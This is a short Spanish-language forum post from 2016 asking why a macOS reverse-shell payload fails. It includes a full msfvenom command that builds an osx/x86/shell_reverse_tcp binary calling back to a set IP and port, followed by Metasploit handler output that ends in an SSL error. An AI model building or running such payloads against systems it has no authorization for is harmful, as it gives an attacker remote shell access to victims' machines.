Problemas MSFvenom con mac os

Iniciado por AleXxSnJR, 26 Diciembre 2016, 13:50 PM

0 Miembros y 1 Visitante están viendo este tema.

AleXxSnJR

Hola, tengo un problema , usando un payload reverso de macOS con kali linux y no se q hacer ya para que funcione

el comando q uso es este

msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.120.132 LPORT=4488 -f macho > s.macho


luego pongo el multi hander y todo correcto , es mas hay conexion entre los equipos pero me sale esto:

msf exploit(handler) > run

  • Started reverse TCP handler on 192.168.120.132:4488
  • Starting the payload handler...
  • Sending stage (957999 bytes) to 192.168.120.131
    [-] OpenSSL::SSL::SSLError SSL_accept returned=1 errno=0 state=SSLv2/v3 read client hello A: unknown protocol



    ¿Alguna idea?